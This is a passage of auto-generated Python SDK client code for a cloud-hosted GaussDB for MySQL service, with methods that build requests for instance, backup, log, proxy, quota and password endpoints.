Deletes a read-only node of an instance. In multi-AZ mode, a read-only node can be deleted only if the remaining read-only nodes and the primary node still sit in different availability zones afterwards.
:param DeleteGaussMySqlReadonlyNodeRequest request
:return: DeleteGaussMySqlReadonlyNodeResponse
"""
all_params = ['instance_id', 'node_id', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
if 'node_id' in local_var_params:
path_params['node_id'] = local_var_params['node_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/nodes/{node_id}',
method='DELETE',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='DeleteGaussMySqlReadonlyNodeResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def expand_gauss_my_sql_instance_volume_async(self, request):
"""Expand storage of a yearly/monthly instance
Expands the storage of a yearly/monthly (prepaid) instance.
:param ExpandGaussMySqlInstanceVolumeRequest request
:return: ExpandGaussMySqlInstanceVolumeResponse
"""
return self.expand_gauss_my_sql_instance_volume_with_http_info(request)
def expand_gauss_my_sql_instance_volume_with_http_info(self, request):
"""Expand storage of a yearly/monthly instance
Expands the storage of a yearly/monthly (prepaid) instance.
:param ExpandGaussMySqlInstanceVolumeRequest request
:return: ExpandGaussMySqlInstanceVolumeResponse
"""
all_params = ['instance_id', 'mysql_extend_instance_volume_request', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/volume/extend',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ExpandGaussMySqlInstanceVolumeResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def expand_gauss_my_sql_proxy_async(self, request):
"""Scale out database proxy nodes
Increases the number of database proxy nodes. DeC (dedicated cloud) accounts do not yet support the database proxy.
:param ExpandGaussMySqlProxyRequest request
:return: ExpandGaussMySqlProxyResponse
"""
return self.expand_gauss_my_sql_proxy_with_http_info(request)
def expand_gauss_my_sql_proxy_with_http_info(self, request):
"""Scale out database proxy nodes
Increases the number of database proxy nodes. DeC (dedicated cloud) accounts do not yet support the database proxy.
:param ExpandGaussMySqlProxyRequest request
:return: ExpandGaussMySqlProxyResponse
"""
all_params = ['instance_id', 'enlarge_proxy_request', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/proxy/enlarge',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ExpandGaussMySqlProxyResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_gauss_my_sql_configurations_async(self, request):
"""Query parameter templates
Obtains the list of parameter templates, including the default templates of all databases and user-created templates.
:param ListGaussMySqlConfigurationsRequest request
:return: ListGaussMySqlConfigurationsResponse
"""
return self.list_gauss_my_sql_configurations_with_http_info(request)
def list_gauss_my_sql_configurations_with_http_info(self, request):
"""Query parameter templates
Obtains the list of parameter templates, including the default templates of all databases and user-created templates.
:param ListGaussMySqlConfigurationsRequest request
:return: ListGaussMySqlConfigurationsResponse
"""
all_params = ['x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/configurations',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListGaussMySqlConfigurationsResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_gauss_my_sql_dedicated_resources_async(self, request):
"""Query dedicated resource pools
Obtains the list of dedicated resource pools, including all dedicated resource pools the user has enabled.
:param ListGaussMySqlDedicatedResourcesRequest request
:return: ListGaussMySqlDedicatedResourcesResponse
"""
return self.list_gauss_my_sql_dedicated_resources_with_http_info(request)
def list_gauss_my_sql_dedicated_resources_with_http_info(self, request):
"""Query dedicated resource pools
Obtains the list of dedicated resource pools, including all dedicated resource pools the user has enabled.
:param ListGaussMySqlDedicatedResourcesRequest request
:return: ListGaussMySqlDedicatedResourcesResponse
"""
all_params = ['x_language', 'offset', 'limit']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/dedicated-resources',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListGaussMySqlDedicatedResourcesResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_gauss_my_sql_error_log_async(self, request):
"""Query database error logs
Queries database error logs.
:param ListGaussMySqlErrorLogRequest request
:return: ListGaussMySqlErrorLogResponse
"""
return self.list_gauss_my_sql_error_log_with_http_info(request)
def list_gauss_my_sql_error_log_with_http_info(self, request):
"""Query database error logs
Queries database error logs.
:param ListGaussMySqlErrorLogRequest request
:return: ListGaussMySqlErrorLogResponse
"""
all_params = ['instance_id', 'start_date', 'end_date', 'x_language', 'offset', 'limit', 'level', 'node_id']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
if 'start_date' in local_var_params:
query_params.append(('start_date', local_var_params['start_date']))
if 'end_date' in local_var_params:
query_params.append(('end_date', local_var_params['end_date']))
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
if 'level' in local_var_params:
query_params.append(('level', local_var_params['level']))
if 'node_id' in local_var_params:
query_params.append(('node_id', local_var_params['node_id']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/errorlog',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListGaussMySqlErrorLogResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_gauss_my_sql_instances_async(self, request):
"""Query the instance list
Queries the list of instances matching the specified conditions.
:param ListGaussMySqlInstancesRequest request
:return: ListGaussMySqlInstancesResponse
"""
return self.list_gauss_my_sql_instances_with_http_info(request)
def list_gauss_my_sql_instances_with_http_info(self, request):
"""Query the instance list
Queries the list of instances matching the specified conditions.
:param ListGaussMySqlInstancesRequest request
:return: ListGaussMySqlInstancesResponse
"""
all_params = ['x_language', 'id', 'name', 'type', 'datastore_type', 'vpc_id', 'subnet_id', 'offset', 'limit']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
if 'id' in local_var_params:
query_params.append(('id', local_var_params['id']))
if 'name' in local_var_params:
query_params.append(('name', local_var_params['name']))
if 'type' in local_var_params:
query_params.append(('type', local_var_params['type']))
if 'datastore_type' in local_var_params:
query_params.append(('datastore_type', local_var_params['datastore_type']))
if 'vpc_id' in local_var_params:
query_params.append(('vpc_id', local_var_params['vpc_id']))
if 'subnet_id' in local_var_params:
query_params.append(('subnet_id', local_var_params['subnet_id']))
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListGaussMySqlInstancesResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def list_gauss_my_sql_slow_log_async(self, request):
"""Query database slow logs
Queries database slow logs.
:param ListGaussMySqlSlowLogRequest request
:return: ListGaussMySqlSlowLogResponse
"""
return self.list_gauss_my_sql_slow_log_with_http_info(request)
def list_gauss_my_sql_slow_log_with_http_info(self, request):
"""Query database slow logs
Queries database slow logs.
:param ListGaussMySqlSlowLogRequest request
:return: ListGaussMySqlSlowLogResponse
"""
all_params = ['instance_id', 'start_date', 'end_date', 'node_id', 'x_language', 'offset', 'limit', 'type']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
if 'start_date' in local_var_params:
query_params.append(('start_date', local_var_params['start_date']))
if 'end_date' in local_var_params:
query_params.append(('end_date', local_var_params['end_date']))
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
if 'type' in local_var_params:
query_params.append(('type', local_var_params['type']))
if 'node_id' in local_var_params:
query_params.append(('node_id', local_var_params['node_id']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/slowlog',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ListGaussMySqlSlowLogResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def reset_gauss_my_sql_password_async(self, request):
"""Reset the database password
Resets the database password.
:param ResetGaussMySqlPasswordRequest request
:return: ResetGaussMySqlPasswordResponse
"""
return self.reset_gauss_my_sql_password_with_http_info(request)
def reset_gauss_my_sql_password_with_http_info(self, request):
"""Reset the database password
Resets the database password.
:param ResetGaussMySqlPasswordRequest request
:return: ResetGaussMySqlPasswordResponse
"""
all_params = ['instance_id', 'mysql_reset_password_request', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/password',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ResetGaussMySqlPasswordResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def set_gauss_my_sql_quotas_async(self, request):
"""Set enterprise-project-based resource quotas for a tenant
Sets the resource quotas of the specified enterprise project.
:param SetGaussMySqlQuotasRequest request
:return: SetGaussMySqlQuotasResponse
"""
return self.set_gauss_my_sql_quotas_with_http_info(request)
def set_gauss_my_sql_quotas_with_http_info(self, request):
"""Set enterprise-project-based resource quotas for a tenant
Sets the resource quotas of the specified enterprise project.
:param SetGaussMySqlQuotasRequest request
:return: SetGaussMySqlQuotasResponse
"""
all_params = ['x_language', 'set_quotas_request']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/quotas',
method='POST',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='SetGaussMySqlQuotasResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_backup_list_async(self, request):
"""Query the backup list
Queries the list of backups.
:param ShowGaussMySqlBackupListRequest request
:return: ShowGaussMySqlBackupListResponse
"""
return self.show_gauss_my_sql_backup_list_with_http_info(request)
def show_gauss_my_sql_backup_list_with_http_info(self, request):
"""Query the backup list
Queries the list of backups.
:param ShowGaussMySqlBackupListRequest request
:return: ShowGaussMySqlBackupListResponse
"""
all_params = ['x_language', 'instance_id', 'backup_id', 'backup_type', 'offset', 'limit', 'begin_time', 'end_time']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
if 'instance_id' in local_var_params:
query_params.append(('instance_id', local_var_params['instance_id']))
if 'backup_id' in local_var_params:
query_params.append(('backup_id', local_var_params['backup_id']))
if 'backup_type' in local_var_params:
query_params.append(('backup_type', local_var_params['backup_type']))
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
if 'begin_time' in local_var_params:
query_params.append(('begin_time', local_var_params['begin_time']))
if 'end_time' in local_var_params:
query_params.append(('end_time', local_var_params['end_time']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/backups',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlBackupListResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_backup_policy_async(self, request):
"""Query the automated backup policy
Queries the automated backup policy.
:param ShowGaussMySqlBackupPolicyRequest request
:return: ShowGaussMySqlBackupPolicyResponse
"""
return self.show_gauss_my_sql_backup_policy_with_http_info(request)
def show_gauss_my_sql_backup_policy_with_http_info(self, request):
"""Query the automated backup policy
Queries the automated backup policy.
:param ShowGaussMySqlBackupPolicyRequest request
:return: ShowGaussMySqlBackupPolicyResponse
"""
all_params = ['instance_id', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/backups/policy',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlBackupPolicyResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_engine_version_async(self, request):
"""Query database engine versions
Obtains the database version information for the specified database engine.
:param ShowGaussMySqlEngineVersionRequest request
:return: ShowGaussMySqlEngineVersionResponse
"""
return self.show_gauss_my_sql_engine_version_with_http_info(request)
def show_gauss_my_sql_engine_version_with_http_info(self, request):
"""Query database engine versions
Obtains the database version information for the specified database engine.
:param ShowGaussMySqlEngineVersionRequest request
:return: ShowGaussMySqlEngineVersionResponse
"""
all_params = ['database_name', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'database_name' in local_var_params:
path_params['database_name'] = local_var_params['database_name']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/datastores/{database_name}',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlEngineVersionResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_flavors_async(self, request):
"""Query database specifications
Obtains the specifications (flavors) available for the specified database engine version.
:param ShowGaussMySqlFlavorsRequest request
:return: ShowGaussMySqlFlavorsResponse
"""
return self.show_gauss_my_sql_flavors_with_http_info(request)
def show_gauss_my_sql_flavors_with_http_info(self, request):
"""Query database specifications
Obtains the specifications (flavors) available for the specified database engine version.
:param ShowGaussMySqlFlavorsRequest request
:return: ShowGaussMySqlFlavorsResponse
"""
all_params = ['database_name', 'availability_zone_mode', 'x_language', 'version_name', 'spec_code']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'database_name' in local_var_params:
path_params['database_name'] = local_var_params['database_name']
query_params = []
if 'version_name' in local_var_params:
query_params.append(('version_name', local_var_params['version_name']))
if 'availability_zone_mode' in local_var_params:
query_params.append(('availability_zone_mode', local_var_params['availability_zone_mode']))
if 'spec_code' in local_var_params:
query_params.append(('spec_code', local_var_params['spec_code']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/flavors/{database_name}',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlFlavorsResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_instance_info_async(self, request):
"""Query instance details
Queries the details of an instance.
:param ShowGaussMySqlInstanceInfoRequest request
:return: ShowGaussMySqlInstanceInfoResponse
"""
return self.show_gauss_my_sql_instance_info_with_http_info(request)
def show_gauss_my_sql_instance_info_with_http_info(self, request):
"""Query instance details
Queries the details of an instance.
:param ShowGaussMySqlInstanceInfoRequest request
:return: ShowGaussMySqlInstanceInfoResponse
"""
all_params = ['instance_id', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlInstanceInfoResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_job_info_async(self, request):
"""Query the task with a specified ID
Obtains information about the task with the specified ID.
:param ShowGaussMySqlJobInfoRequest request
:return: ShowGaussMySqlJobInfoResponse
"""
return self.show_gauss_my_sql_job_info_with_http_info(request)
def show_gauss_my_sql_job_info_with_http_info(self, request):
"""Query the task with a specified ID
Obtains information about the task with the specified ID.
:param ShowGaussMySqlJobInfoRequest request
:return: ShowGaussMySqlJobInfoResponse
"""
all_params = ['id', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
if 'id' in local_var_params:
query_params.append(('id', local_var_params['id']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/jobs',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlJobInfoResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_project_quotas_async(self, request):
"""Query the instance quotas of a tenant
Obtains the resource quotas of the specified tenant.
:param ShowGaussMySqlProjectQuotasRequest request
:return: ShowGaussMySqlProjectQuotasResponse
"""
return self.show_gauss_my_sql_project_quotas_with_http_info(request)
def show_gauss_my_sql_project_quotas_with_http_info(self, request):
"""Query the instance quotas of a tenant
Obtains the resource quotas of the specified tenant.
:param ShowGaussMySqlProjectQuotasRequest request
:return: ShowGaussMySqlProjectQuotasResponse
"""
all_params = ['x_language', 'type']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
if 'type' in local_var_params:
query_params.append(('type', local_var_params['type']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/project-quotas',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlProjectQuotasResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_proxy_async(self, request):
"""Query database proxy information
Queries database proxy information.
:param ShowGaussMySqlProxyRequest request
:return: ShowGaussMySqlProxyResponse
"""
return self.show_gauss_my_sql_proxy_with_http_info(request)
def show_gauss_my_sql_proxy_with_http_info(self, request):
"""Query database proxy information
Queries database proxy information.
:param ShowGaussMySqlProxyRequest request
:return: ShowGaussMySqlProxyResponse
"""
all_params = ['instance_id', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/proxy',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlProxyResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_proxy_flavors_async(self, request):
"""Query database proxy specifications
Queries the database proxy specifications.
:param ShowGaussMySqlProxyFlavorsRequest request
:return: ShowGaussMySqlProxyFlavorsResponse
"""
return self.show_gauss_my_sql_proxy_flavors_with_http_info(request)
def show_gauss_my_sql_proxy_flavors_with_http_info(self, request):
"""Query database proxy specifications
Queries the database proxy specifications.
:param ShowGaussMySqlProxyFlavorsRequest request
:return: ShowGaussMySqlProxyFlavorsResponse
"""
all_params = ['instance_id', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/proxy/flavors',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlProxyFlavorsResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_quotas_async(self, request):
"""Query enterprise-project-based resource quotas of a tenant
Obtains the resource quotas of the specified enterprise project.
:param ShowGaussMySqlQuotasRequest request
:return: ShowGaussMySqlQuotasResponse
"""
return self.show_gauss_my_sql_quotas_with_http_info(request)
def show_gauss_my_sql_quotas_with_http_info(self, request):
"""Query enterprise-project-based resource quotas of a tenant
Obtains the resource quotas of the specified enterprise project.
:param ShowGaussMySqlQuotasRequest request
:return: ShowGaussMySqlQuotasResponse
"""
all_params = ['x_language', 'offset', 'limit', 'enterprise_project_name']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
if 'enterprise_project_name' in local_var_params:
query_params.append(('enterprise_project_name', local_var_params['enterprise_project_name']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/quotas',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlQuotasResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def update_gauss_my_sql_backup_policy_async(self, request):
"""修改备份策略
修改备份策略
:param UpdateGaussMySqlBackupPolicyRequest request
:return: UpdateGaussMySqlBackupPolicyResponse
"""
return self.update_gauss_my_sql_backup_policy_with_http_info(request)
def update_gauss_my_sql_backup_policy_with_http_info(self, request):
"""修改备份策略
修改备份策略
:param UpdateGaussMySqlBackupPolicyRequest request
:return: UpdateGaussMySqlBackupPolicyResponse
"""
all_params = ['instance_id', 'mysql_update_backup_policy_request', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
